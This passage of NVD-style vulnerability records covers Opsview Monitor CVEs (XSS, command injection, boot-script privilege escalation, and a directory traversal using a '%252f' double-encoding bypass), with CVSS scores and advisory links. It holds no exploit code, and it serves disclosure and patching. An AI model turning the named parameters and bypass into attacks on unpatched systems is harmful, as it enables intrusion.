"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-01-02T15:15:11.413",
"references": [
{
"source": "PSIRT-CNA@flexerasoftware.com",
"tags": [
"Release Notes"
],
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
},
{
"source": "PSIRT-CNA@flexerasoftware.com",
"tags": [
"Broken Link"
],
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
}
],
"sourceIdentifier": "PSIRT-CNA@flexerasoftware.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-352"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2018-16148
Vulnerability from fkie_nvd - Published: 2018-09-05 21:29 - Updated: 2024-11-21 03:52

| Source | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | https://knowledge.opsview.com/v5.3/docs/whats-new | Release Notes, Vendor Advisory | |
| cve@mitre.org | https://knowledge.opsview.com/v5.4/docs/whats-new | Release Notes, Vendor Advisory | |
| cve@mitre.org | https://seclists.org/fulldisclosure/2018/Sep/3 | Exploit, Mailing List, Third Party Advisory | |
| cve@mitre.org | https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://knowledge.opsview.com/v5.3/docs/whats-new | Release Notes, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://knowledge.opsview.com/v5.4/docs/whats-new | Release Notes, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://seclists.org/fulldisclosure/2018/Sep/3 | Exploit, Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities | Exploit, Third Party Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4BA91D4C-DEBC-47E3-84EF-660587F02D1E",
"versionEndExcluding": "5.3.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"matchCriteriaId": "60700697-09A0-4FBB-A747-2411A7A022BC",
"versionEndExcluding": "5.4.2",
"versionStartIncluding": "5.4.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The diagnosticsb2ksy parameter of the /rest endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting."
},
{
"lang": "es",
"value": "El par\u00e1metro diagnosticsb2ksy del endpoint /rest en Opsview Monitor en versiones anteriores a la 5.3.1 y versiones 5.4.x anteriores a la 5.4.2 es vulnerable a Cross-Site Scripting (XSS)."
}
],
"id": "CVE-2018-16148",
"lastModified": "2024-11-21T03:52:10.150",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-09-05T21:29:03.063",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2018-16145
Vulnerability from fkie_nvd - Published: 2018-09-05 21:29 - Updated: 2024-11-21 03:52

| Source | URL | Tags |
|---|---|---|
| cve@mitre.org | https://knowledge.opsview.com/v5.3/docs/whats-new | Release Notes, Vendor Advisory |
| cve@mitre.org | https://knowledge.opsview.com/v5.4/docs/whats-new | Release Notes, Vendor Advisory |
| cve@mitre.org | https://seclists.org/fulldisclosure/2018/Sep/3 | Exploit, Mailing List, Third Party Advisory |
| cve@mitre.org | https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities | Exploit, Third Party Advisory |
| af854a3a-2127-422b-91ae-364da2661108 | https://knowledge.opsview.com/v5.3/docs/whats-new | Release Notes, Vendor Advisory |
| af854a3a-2127-422b-91ae-364da2661108 | https://knowledge.opsview.com/v5.4/docs/whats-new | Release Notes, Vendor Advisory |
| af854a3a-2127-422b-91ae-364da2661108 | https://seclists.org/fulldisclosure/2018/Sep/3 | Exploit, Mailing List, Third Party Advisory |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities | Exploit, Third Party Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4BA91D4C-DEBC-47E3-84EF-660587F02D1E",
"versionEndExcluding": "5.3.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"matchCriteriaId": "60700697-09A0-4FBB-A747-2411A7A022BC",
"versionEndExcluding": "5.4.2",
"versionStartIncluding": "5.4.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The /etc/init.d/opsview-reporting-module script that runs at boot time in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 invokes a file that can be edited by the nagios user, and would allow attackers to elevate their privileges to root after a system restart, hence obtaining full control of the appliance."
},
{
"lang": "es",
"value": "El script en /etc/init.d/opsview-reporting-module que se ejecuta en tiempo de ejecuci\u00f3n en Opsview Monitor en versiones anteriores a la 5.3.1 y versiones 5.4.x anteriores a la 5.4.2 invoca un archivo que puede ser editado por el usuario nagios y permitir\u00eda que los atacantes eleven sus privilegios a root tras un reinicio del sistema, obteniendo as\u00ed el control total del aparato."
}
],
"id": "CVE-2018-16145",
"lastModified": "2024-11-21T03:52:09.680",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-09-05T21:29:02.627",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-732"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2018-16147
Vulnerability from fkie_nvd - Published: 2018-09-05 21:29 - Updated: 2024-11-21 03:52

| Source | URL | Tags |
|---|---|---|
| cve@mitre.org | https://knowledge.opsview.com/v5.3/docs/whats-new | Release Notes, Vendor Advisory |
| cve@mitre.org | https://knowledge.opsview.com/v5.4/docs/whats-new | Release Notes, Vendor Advisory |
| cve@mitre.org | https://seclists.org/fulldisclosure/2018/Sep/3 | Exploit, Mailing List, Third Party Advisory |
| cve@mitre.org | https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities | Exploit, Third Party Advisory |
| af854a3a-2127-422b-91ae-364da2661108 | https://knowledge.opsview.com/v5.3/docs/whats-new | Release Notes, Vendor Advisory |
| af854a3a-2127-422b-91ae-364da2661108 | https://knowledge.opsview.com/v5.4/docs/whats-new | Release Notes, Vendor Advisory |
| af854a3a-2127-422b-91ae-364da2661108 | https://seclists.org/fulldisclosure/2018/Sep/3 | Exploit, Mailing List, Third Party Advisory |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities | Exploit, Third Party Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4BA91D4C-DEBC-47E3-84EF-660587F02D1E",
"versionEndExcluding": "5.3.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"matchCriteriaId": "60700697-09A0-4FBB-A747-2411A7A022BC",
"versionEndExcluding": "5.4.2",
"versionStartIncluding": "5.4.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The data parameter of the /settings/api/router endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting."
},
{
"lang": "es",
"value": "El par\u00e1metro data del endpoint /settings/api/router en Opsview Monitor en versiones anteriores a la 5.3.1 y versiones 5.4.x anteriores a la 5.4.2 es vulnerable a Cross-Site Scripting (XSS)."
}
],
"id": "CVE-2018-16147",
"lastModified": "2024-11-21T03:52:09.987",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-09-05T21:29:02.937",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2018-16144
Vulnerability from fkie_nvd - Published: 2018-09-05 21:29 - Updated: 2024-11-21 03:52

| Source | URL | Tags |
|---|---|---|
| cve@mitre.org | https://knowledge.opsview.com/v5.3/docs/whats-new | Release Notes, Vendor Advisory |
| cve@mitre.org | https://knowledge.opsview.com/v5.4/docs/whats-new | Release Notes, Vendor Advisory |
| cve@mitre.org | https://seclists.org/fulldisclosure/2018/Sep/3 | Exploit, Mailing List, Third Party Advisory |
| cve@mitre.org | https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities | Exploit, Third Party Advisory |
| af854a3a-2127-422b-91ae-364da2661108 | https://knowledge.opsview.com/v5.3/docs/whats-new | Release Notes, Vendor Advisory |
| af854a3a-2127-422b-91ae-364da2661108 | https://knowledge.opsview.com/v5.4/docs/whats-new | Release Notes, Vendor Advisory |
| af854a3a-2127-422b-91ae-364da2661108 | https://seclists.org/fulldisclosure/2018/Sep/3 | Exploit, Mailing List, Third Party Advisory |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities | Exploit, Third Party Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4BA91D4C-DEBC-47E3-84EF-660587F02D1E",
"versionEndExcluding": "5.3.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"matchCriteriaId": "60700697-09A0-4FBB-A747-2411A7A022BC",
"versionEndExcluding": "5.4.2",
"versionStartIncluding": "5.4.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The test connection functionality in the NetAudit section of Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to command injection due to improper sanitization of the rancid_password parameter."
},
{
"lang": "es",
"value": "La funcionalidad de conexi\u00f3n de prueba en la secci\u00f3n NetAudit de Opsview Monitor en versiones anteriores a la 5.3.1 y versiones 5.4.x anteriores a la 5.4.2 es vulnerable a una inyecci\u00f3n de comandos debido al saneamiento incorrecto del par\u00e1metro rancid_password."
}
],
"id": "CVE-2018-16144",
"lastModified": "2024-11-21T03:52:09.503",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-09-05T21:29:02.500",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-78"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2018-16146
Vulnerability from fkie_nvd - Published: 2018-09-05 21:29 - Updated: 2024-11-21 03:52

| Source | URL | Tags |
|---|---|---|
| cve@mitre.org | https://knowledge.opsview.com/v5.4/docs/whats-new | Vendor Advisory |
| cve@mitre.org | https://seclists.org/fulldisclosure/2018/Sep/3 | Exploit, Mailing List, Third Party Advisory |
| cve@mitre.org | https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities | Exploit, Third Party Advisory |
| af854a3a-2127-422b-91ae-364da2661108 | https://knowledge.opsview.com/v5.4/docs/whats-new | Vendor Advisory |
| af854a3a-2127-422b-91ae-364da2661108 | https://seclists.org/fulldisclosure/2018/Sep/3 | Exploit, Mailing List, Third Party Advisory |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities | Exploit, Third Party Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"matchCriteriaId": "60700697-09A0-4FBB-A747-2411A7A022BC",
"versionEndExcluding": "5.4.2",
"versionStartIncluding": "5.4.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The web management console of Opsview Monitor 5.4.x before 5.4.2 provides functionality accessible by an authenticated administrator to test notifications that are triggered under certain configurable events. The value parameter is not properly sanitized, leading to arbitrary command injection with the privileges of the nagios user account."
},
{
"lang": "es",
"value": "La consola de gesti\u00f3n web de Opsview Monitor en versiones 5.4.x anteriores a la 5.4.2 proporciona funcionalidades a las que puede acceder un administrador autenticado para probar notificaciones que se desencadenan en ciertos eventos configurables. El par\u00e1metro value no est\u00e1 debidamente saneado, lo que conduce a una inyecci\u00f3n de comandos arbitrarios con los privilegios de la cuenta de usuario nagios."
}
],
"id": "CVE-2018-16146",
"lastModified": "2024-11-21T03:52:09.833",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-09-05T21:29:02.797",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-78"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2016-10367
Vulnerability from fkie_nvd - Published: 2017-05-03 10:59 - Updated: 2025-04-20 01:37

| Source | URL | Tags |
|---|---|---|
| cve@mitre.org | https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341 | Exploit, Third Party Advisory |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341 | Exploit, Third Party Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:*",
"matchCriteriaId": "FD8E5B51-BCBA-45F0-80AC-F261799D85A9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:opsview:opsview:4.6.4:*:*:*:pro:*:*:*",
"matchCriteriaId": "7EB123AC-31E7-4B3F-98E0-D1DD7F3B1ADE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:opsview:opsview:5.0.2:*:*:*:pro:*:*:*",
"matchCriteriaId": "7E2B55E2-5943-412D-ACBD-1D100234FF55",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:opsview:opsview:5.1.0:*:*:*:pro:*:*:*",
"matchCriteriaId": "A5E29CDA-78E1-418C-9548-F3294FF2DF1A",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "In Opsview Monitor Pro (Prior to 5.1.0.162300841, prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch), an unauthenticated Directory Traversal vulnerability can be exploited by issuing a specially crafted HTTP GET request utilizing a simple URL encoding bypass, %252f instead of /."
},
{
"lang": "es",
"value": "En Opsview Monitor Pro (versiones anteriores a la 5.1.0.162300841, anteriores a la 5.0.2.27475, anteriores a la 4.6.4.162391051 y 4.5.x sin el parche de seguridad de 2016), una vulnerabilidad de salto de directorio no autenticado puede explotarse a trav\u00e9s de una petici\u00f3n HTTP GET especialmente manipulada, eludiendo la codificaci\u00f3n URL de / utilizando %252f."
}
],
"id": "CVE-2016-10367",
"lastModified": "2025-04-20T01:37:25.860",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
